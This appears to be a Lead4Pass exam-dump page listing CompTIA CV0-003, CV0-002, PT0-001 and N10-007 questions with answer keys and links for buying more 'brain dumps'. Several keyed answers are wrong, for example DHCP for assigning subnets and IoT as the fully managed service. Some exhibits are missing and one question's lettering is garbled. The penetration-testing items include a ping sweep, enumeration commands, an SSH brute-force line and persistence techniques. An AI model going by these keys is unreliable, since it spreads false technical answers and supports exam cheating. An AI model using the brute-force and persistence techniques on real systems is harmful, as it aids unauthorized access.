QUESTION 6 A company recently experienced a power outage that lasted 30 minutes. During this time, a whole rack of servers was inaccessible, even though the servers did not lose power. Which of the following should be investigated FIRST? A. Server power B. Rack power C. Switch power D. SAN power Correct Answer: C
QUESTION 7 A web server has been deployed in a public IaaS provider and has been assigned the public IP address of 72.135.10.100. Users are now reporting that when they browse to the website, they receive a message indicating the service is unavailable. The cloud administrator logs into the server, runs a netstat command, and notices the following relevant output:
Which of the following actions should the cloud administrator take to resolve the issue? A. Assign a new IP address of 192.168.100.10 to the web server B. Modify the firewall on 72.135.10.100 to allow only UDP C. Configure the WAF to filter requests from 17.3.130.3 D. Update the gateway on the web server to use 72.135.10.1 Correct Answer: D
QUESTION 8 An administrator is implementing a private cloud that will be used as a test environment. To limit the number of guests per subnet to a maximum of 14, the administrator implemented a /20 network. Which of the following should the administrator use to assign the networks? A. DHCP B. Subnet C. VLAN D. Gateway Correct Answer: A
QUESTION 9 A software company recently moved all of its development testing to a public cloud environment. The company primarily uses IaaS to deploy and test its code. The company needs the software developers to be more agile and efficient when testing application code. Which of the following backup types should the developers use to BEST ensure the speedy recovery of a system if it is damaged? A. Snapshots B. Full C. Incremental D. Differential Correct Answer: C
QUESTION 10 A cloud architect wants to minimize the risk of having systems administrators in an IaaS compute instance perform application code changes. The development group should be the only group allowed to modify files in the directory. Which of the following will accomplish the desired objective? A. Remove the file write permissions for the application service account. B. Restrict the file write permissions to the development group only. C. Add access to the fileshare for the systems administrator\\’s group. D. Deny access to all development user accounts Correct Answer: B
QUESTION 11 A software development manager is looking for a solution that will allow a team of developers to work in isolated environments that can be spun up and torn down quickly. Which of the following is the MOST appropriate solution? A. Containers B. File subscriptions C. Ballooning D. Software-defined storage Correct Answer: A
QUESTION 12 Which of the following cloud services is fully managed? A. IaaS B. GPU in the cloud C. IoT D. Serverless compute E. SaaS Correct Answer: C Reference: https://developers.google.com/iot
QUESTION 13 A company has developed a cloud-ready application. Before deployment, an administrator needs to select a deployment technology that provides a high level of portability and is lightweight in terms of footprint and resource requirements. Which of the following solutions will be BEST to help the administrator achieve the requirements? A. Containers B. Infrastructure as code C. Desktop virtualization D. Virtual machines Correct Answer: A Reference: https://blog.netapp.com/blogs/containers-vs-vms/
QUESTION 14 An organization is hosting a DNS domain with private and public IP ranges. Which of the following should be implemented to achieve ease of management? A. Network peering B. A CDN solution C. A SDN solution D. An IPAM solution Correct Answer: D Reference: https://www.infoblox.com/glossary/ipam-ip-address-management/
QUESTION 15 An organization purchased new servers with GPUs for render farms. The servers have limited CPU resources. Which of the following GPU configurations will be the MOST optimal for virtualizing this environment? A. Dedicated B. Shared C. Passthrough D. vGPU Correct Answer: D
Update the latest valid CompTIA CV0-003 test questions and answers throughout the year. Upload the latest CV0-003 exam practice questions and CV0-003 PDF for free every month. Get the complete CV0-003 Brain Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass CV0-003 Dumps (including PDF and VCE), please visit: https://www.leads4pass.com/cv0-003.html (PDF + VCE)
The latest updated and revised CompTIA CV0-002 exam questions and answers come from Lead4Pass! Complete CompTIA CV0-002 dumps certification questions! Welcome to download the latest Lead4Pass CompTIA CV0-002 dumps with PDF and VCE: https://www.leads4pass.com/cv0-002.html (491 Q&A)
Latest update CompTIA CV0-002 exam questions and answers online practice test
QUESTION 1 A server hosting file shares is an example of which of the following types of storage? A. SAN B. NAS C. SATA D. SAS Correct Answer: B
QUESTION 2 A company moved its on-premises applications to several SaaS providers. As a result, the security team is concerned about accounts being compromised. Which of the following should the security tem implement to reduce this risk? A. Multifactor authentication B. Single sign-on C. Federation D. Role-based access control E. Virtual private network Correct Answer: D
QUESTION 3 A company is interested in a DRP. The purpose of the plan is to recover business as soon as possible. The MOST effective technique is: A. archiving. B. network clustering. C. site mirroring. D. active/active. Correct Answer: D
QUESTION 4 A hospital is deploying a web-based application in its private cloud to service multiple facilities in a region. This application is used by employees of the hospital, as well as the patients and their families. Which of the following security configurations is MOST likely to be deployed to secure the information from the application? A. IPSec B. PPTP C. L2TP D. SSL/TLS Correct Answer: D
QUESTION 5 Based on demand, an IaaS provider wants to deploy a security application for its customers. Which of the following is the BEST technique for the IaaS provider to apply this to target systems? A. Vendor application B. Scripting C. Orchestration D. Custom programming Correct Answer: C
QUESTION 6 A company requires all system logs to be saved for a minimum 30 days. However, many employees are reporting storage near capacity alerts. A cloud administrator is trying to fix and prevent this issue from happening again. Which of the following is the BEST option? A. Automate log deletion for logs older than 30 days. This job should run every day to clean up. B. Automate archiving of the logs older than 30 days, and create a scheduled job to clean up daily logs older than 30 days C. Automate migration of the log archiving storage to offline backup, and create a job to check and delete logs every 30 days. D. Automate the clearing of the logs older than 30 days, and add more capacity to the log file storage. Correct Answer: A
QUESTION 7 The development team of an e-commerce organization is migrating its code libraries to a public IaaS cloud provider, and the security policy states that source code must use multiple security controls to secure and restrict access. Which of the following combinations of controls would be BEST to meet the requirements? A. Use directory federation across the organization for all users and biometric access on the developers\\’ laptop instead of VPN. B. Use VPN and two-factor authentication for the developers to access the online repositories for remote developers. C. Use SSO across the organization and an existing data loss prevention solution to prevent code repository leakage. D. Use a third-party CASB solution that sets policies to detect potential compromise of code libraries. Correct Answer: B
QUESTION 8 A cloud administrator is securing an application hosted by an IaaS provider. The operating system on the VM has been updated. Which of the following should the administrator use to BEST secure the VM from attacks against vulnerable services regardless of operating system? A. Firewall B. Antivirus C. Intrusion detection D. Patch management Correct Answer: C
QUESTION 9 An organization allows clients to retrieve information on earthquake events. This is a description of which of the following classifications? A. XaaS B. DaaS C. CaaS D. SaaS Correct Answer: A
QUESTION 10 A financial services company has a requirement to keep backups on premises for 30 days and off-site for up to seven years to a location that is within 100mi (161km) of the primary datacenter location. Recovery times for backups kept onsite have an RTO of one hour, while recovery times for backups kept off-site have an RTO of four hours. Which of the following solutions BEST solves this requirement? A. Implement a full-based backup and recovery solution for backups within 30 days or less. For backups kept longer than 30 days, migrate them to a cloud provider that will host the data within 100mi (161km) of the financial services company\\’s primary datacenter. B. Implement a clone-based backup and recovery solution for backups within 30 days or less. For backups kept longer than 30 days, migrate them to a cloud provider that will host the data within 100mi (161km) of the financial services company\\’s primary datacenter. C. Implement an incremental-based backup and recovery solution for backups within 30 days or less. For backups kept longer than 30 days, migrate them to a cloud provider that will host the data within 62mi (100km) of the financial services company\\’s primary datacenter. D. Implement a snapshot-based backup and recovery solution for backups within 30 days or less. For backups kept longer than 30 days, migrate them to a cloud provider that will host the data within 100mi (161km) of the financial services company\\’s primary datacenter. Correct Answer: B
QUESTION 11 A cloud engineer is migrating an application running on an on-premises server to a SaaS solution. The cloud engineer has validated the SaaS solution, as well as created and tested a migration plan. Which of the following should the cloud engineer do before performing the migration? (Choose two.) A. Document in the change management database. B. Document the test findings. C. Gain approval from the CAB. D. Create a rollback plan. E. Submit a request for change. F. Agree upon a change windows. G. Establish a plan of action. Correct Answer: DG
QUESTION 12 A company has just established a new branch office that needs to connect back to centrally hosted applications for day to day operations. The branch office has noted that access to many company services are slow and causing a drop in productivity. The company IT department has investigated a plan to improve performance across the link to the branch office without having to pay for more bandwidth from the Internet Service Provider. This plan includes hardware that after installation will allow for much faster access to day to day business applications. Which of the following terms BEST describes the action taken by the IT department? A. LAN optimization B. WAN optimization C. Load balancing D. Bandwidth compression Correct Answer: B
QUESTION 13 A recent advertisement campaign has increased traffic to an e-commerce application that is hosted within a public cloud environment. Customers are reporting that it takes too long to load their pages and submit orders. A cloud administrator looks at the metrics from the environment and sees high utilization of the CPU and memory resources. The cloud provider offers several preconfigured sizes for server template: x-small, small, medium, large, x-large, and 2x-large.
Given an expected increase in workload, which of the following is the BEST solution to improve application performance? A. Change the server template size for Inxpc003 to 2x-large. B. Provision additional Inxpc servers using the 2x-large template. C. Add memory to Inxpc002, Inxpc003, and Inxpc003. D. Change the role of Inxw001 from web to application. Correct Answer: A
QUESTION 14 A cloud administrator for a state government agency is tasked with giving access to the voter registration application to a government agency in another state. Only authorized officials from each state should access the application. These agencies have a common environment where applications have been deployed in the past. Which of the following should the cloud administrator do to give access to the application? A. Deploy part of the application into a public cloud and establish secure connections to a private cloud environment. B. Deploy the application to a community cloud that is shared with multiple state government agencies only. C. Deploy the application to a public cloud and implement ACLs and security access policies to limit access. D. Deploy the application to the state\\’s private cloud and give authentication credentials to the other state\\’s authorized officials. Correct Answer: C
QUESTION 15 A cloud engineer is required to ensure all servers in the cloud environment meet requirements for PCI compliance. One of the requirements is to make certain all administrator logins and commands are logged. Which of the following is the BEST approach to meet these requirements? A. Enable configuration change tracking for all servers in the public cloud provider\\’s dashboard. B. Enable detailed monitoring for all servers in the public cloud provider\\’s dashboard. C. Define and enable audit tracking rules on each server in the public cloud environment. D. Modify the cloud provider\\’s role-based authorization policies to log user session activity. Correct Answer: A
Update the latest valid CompTIA CV0-002 test questions and answers throughout the year. Upload the latest CV0-002 exam practice questions and CV0-002 PDF for free every month. Get the complete CV0-002 Brain Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass CV0-002 Dumps (including PDF and VCE), please visit: https://www.leads4pass.com/cv0-002.html (PDF + VCE)
The latest updated and revised CompTIA PT0-001 exam questions and answers come from Lead4Pass! Complete CompTIA PT0-001 dumps certification questions! Welcome to download the latest Lead4Pass CompTIA PT0-001 dumps with PDF and VCE: https://www.leads4pass.com/pt0-001.html (258 Q&A)
Latest update CompTIA PT0-001 exam questions and answers online practice test
QUESTION 1 A penetration tester is performing an annual security assessment for a repeat client The tester finds indicators of previous compromise Which of the following would be the most logical steps to follow NEXT? A. Report the incident to the tester\\’s immediate manager and follow up with the client immediately B. Report the incident to the clients Chief Information Security Officer (CISO) immediately and alter the terms of engagement accordingly C. Report the incident to the client\\’s legal department and then follow up with the client\\’s security operations team D. Make note of the anomaly, continue with the penetration testing and detail it in the final report Correct Answer: A
QUESTION 2 An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment? A. Selection of the appropriate set of security testing tools B. Current and load ratings of the ICS components C. Potential operational and safety hazards D. Electrical certification of hardware used in the test Correct Answer: A
QUESTION 3 A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command: for m in {1..254..1};do ping -c 1 192.168.101.$m; done Which of the following BEST describes the result of running this command? A. Port scan B. Service enumeration C. Live host identification D. Denial of service Correct Answer: C
QUESTION 4 During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them? A. Locating emergency exits B. Preparing a pretext C. Shoulder surfing the victim D. Tailgating the victim Correct Answer: B
QUESTION 5 A company has engaged a penetration tester to perform an assessment for an application that resides in the company\\’s DMZ. Prior to conducting testing, in which of the following solutions should the penetration tester\\’s IP address be whitelisted? A. WAF B. HIDS C. NIDS D. DLP Correct Answer: C
QUESTION 6 A penetration tester is perform initial intelligence gathering on some remote hosts prior to conducting a vulnerability A. The network is submitted as a /25 or greater and the tester needed to access hosts on two different subnets B. The tester is trying to perform a more stealthy scan by including several bogus addresses C. The scanning machine has several interfaces to balance the scan request across at the specified rate D. A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host. Correct Answer: B
QUESTION 7 A penetration tester is reviewing the following output from a wireless sniffer:
Which of the following can be extrapolated from the above information? A. Hardware vendor B. Channel interference C. Usernames D. Key strength Correct Answer: C
QUESTION 8 A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings? A. Ensure the scanner can make outbound DNS requests. B. Ensure the scanner is configured to perform ARP resolution. C. Ensure the scanner is configured to analyze IP hosts. D. Ensure the scanner has the proper plug -ins loaded. Correct Answer: A
QUESTION 9 A penetration tester ran an Nmap scan against a target and received the following output:
Which of the following commands would be best for the penetration tester to execute NEXT to discover any weaknesses or vulnerabilities? A. onesixtyone ? 192.168.121.1 B. enum4linux ? 192.168.121.1 C. snmpwalk ? public 192.168.121.1 D. medusa ? 192.168.121.1 ? users.txt ? passwords.txt ? ssh Correct Answer: C
QUESTION 10 During a penetration test, a tester identifies traditional antivirus running on the exploited server. Which of the following techniques would BEST ensure persistence in a post-exploitation phase? A. Shell binary placed in C:\windows\temp B. Modified daemons C. New user creation D. Backdoored executables Correct Answer: B
QUESTION 11 A penetration tester has run multiple vulnerability scans against a target system. Which of the following would be unique to a credentialed scan? A. Exploits for vulnerabilities found B. Detailed service configurations C. Unpatched third-party software D. Weak access control configurations Correct Answer: A
QUESTION 12 After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker\\’s actual fingerprint without exploitation. Which of the following is the MOST likely of what happened? A. The biometric device is tuned more toward false positives B. The biometric device is configured more toward true negatives C. The biometric device is set to fail closed D. The biometnc device duplicated a valid user\\’s fingerpnnt. Correct Answer: A
QUESTION 13 Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of? A. Lockpicking B. Egress sensor triggering C. Lock bumping D. Lock bypass Correct Answer: D Reference: https://www.triaxiomsecurity.com/2018/08/16/physical-penetration-test- examples/
Update the latest valid CompTIA PT0-001 test questions and answers throughout the year. Upload the latest PT0-001 exam practice questions and PT0-001 PDF for free every month. Get the complete PT0-001 Brain Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass PT0-001 Dumps (including PDF and VCE), please visit: https://www.leads4pass.com/pt0-001.html (PDF + VCE)
The latest updated and revised CompTIA N10-007 exam questions and answers come from Lead4Pass! Complete CompTIA N10-007 dumps certification questions! Welcome to download the latest Lead4Pass CompTIA N10-007 dumps with PDF and VCE: https://www.leads4pass.com/n10-007.html (1148 Q&A)
Latest update CompTIA N10-007 exam questions and answers online practice test
QUESTION 1 A network technician wants to baseline traffic flows on a specific network. Which of the following will provide the GREATEST level of detail? A. Network flow information B. SNMP traps C. Debug level syslog D. Protocol analyzer Correct Answer: D
QUESTION 2 A new employee is unable to access any network resources. All other users are able to access the network at 100Mbps No IP address, subnet mask or default gateway is displayed on the new employee\\’s workstation The network administrator determinates all connectors using the correct standard Upon further investigation the network administrator also notices the following. Wire map results from the user patch cable lo the patch cable connecting to the switch: 1. Pins 5 and 7 are short 2. The distance is 200ft (61m) Additional observations on the switch 1. The VLAN is set correctly 2. The port is not disabled 3. The duplex”;speed settings are correct 4. Port LEOs are off for that port. 5. The port is set to untagged. Which of the following is the MOST likely reason the new employee is having network issues? A. Bad switchport B. Incorrect pinout C. Open/short D. VLAN mismatch E. Distance limitation Correct Answer: A
QUESTION 3 A company recently upgraded a legacy firewall to an NGFW. Which of the following can be deployed without extra hardware to restrict access to offending websites? A. A UTM appliance B. Content filtering C. An IPS D. A proxy server Correct Answer: A
QUESTION 4 A network technician configures a firewall to block only certain IP addresses from accessing the Internet. All users are reporting that they are unable to access the Internet. Which of the following is the MOST likely reason? A. Incorrectly configured ACL B. Implicit allow statement C. SMTP requests are being denied D. All protocols are being allowed in Correct Answer: A
QUESTION 5 A technician has designed a LAN with redundant switches. Which of the following should be configured to ensure network availability? A. VLAN B. Scope options C. Spanning tree D. Flood guard Correct Answer: C
QUESTION 6 A network engineer is hardening the security of a remote office. The firewall at this location needs to remain accessible for remote management by technicians. The firewall vendor advises disabling port 443 from WAN-facing access. In addition to disabling port 443, which of the following can the engineer do to MOST effectively balance the remote connectivity and security needs for this site? A. Enable an IPSec tunnel. B. Enable RDP access to the firewall. C. Enable port 80 access. D. Enable Telnet access to the firewall Correct Answer: B
QUESTION 7 Which of the following would allow a device to maintain the same IP address lease based on the physical address of the network card? A. MAC address reservation B. Static IP address C. IP address exclusion D. Custom DNS server entry Correct Answer: A
QUESTION 8 The security department is looking to install a new IP-based camer A. Plugging the camera into the available Ethernet jack does not power on the camera. Upon further investigation, the cable tests fine, and it does provide power to a VoIP phone. Which of the following is MOST likely causing the issue? B. The brown pair UTP has a short. C. The camera requires 802. 3at power D. The camera requires Cat 7 cabling. E. The switchport has PoE disabled. Correct Answer: C
QUESTION 9 An analog POTS voice line is no longer working and Kim, the technician, is tasked to verify if a dial tone is present at the IDF. Which of the following tools would be used? A. Protocol analyzer B. Butt set C. OTDR D. Toner probe Correct Answer: B
QUESTION 10 A technician recently fixed a computer with several viruses and spyware programs on it and notices the Internet settings were set to redirect all traffic through an unknown proxy. This type of attack is known as which of the following? A. Phishing B. Social engineering C. Man-in-the-middle D. Shoulder surfing Correct Answer: C
QUESTION 11 Which of the following protocols do MOST MITM attacks utilize? A. ARP B. SIP C. FTP D. SCP Correct Answer: A
QUESTION 12 Joe, a technician, was able to copy data at a site with no network equipment between two new laptops, featuring gigabit Ethernet ports, by using a regular straight-through patch cable. Joe then unsuccessfully tried to accomplish the same thing at a different site from his laptop with a gigabit Ethernet port to an older customer unit, which had a 10/100 network port. Which of the following is the cause of this? A. The customer\\’s laptop does not support auto-MDIX. B. Joe\\’s laptop does not support auto-MDIX. C. Straight-through patch cables are prone to crosstalk. D. The customer\\’s laptop NIC does not support full duplex. Correct Answer: A
QUESTION 13 Which of the following is the SHORTEST way to write 2001:0000:0d58:0000:0000:0095:7565:0001 in proper IPv6 shorthand? A. 2001::d58::95:7565:1 B. 2001:0:d58:0:0:95:7565:1 C. 2001:0:d58::95:7565:1 D. 2001:0:0d58::95:7565:1 Correct Answer: C
Update the latest valid CompTIA N10-007 test questions and answers throughout the year. Upload the latest N10-007 exam practice questions and N10-007 PDF for free every month. Get the complete N10-007 Brain Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass N10-007 Dumps (including PDF and VCE), please visit: https://www.leads4pass.com/n10-007.html (PDF + VCE)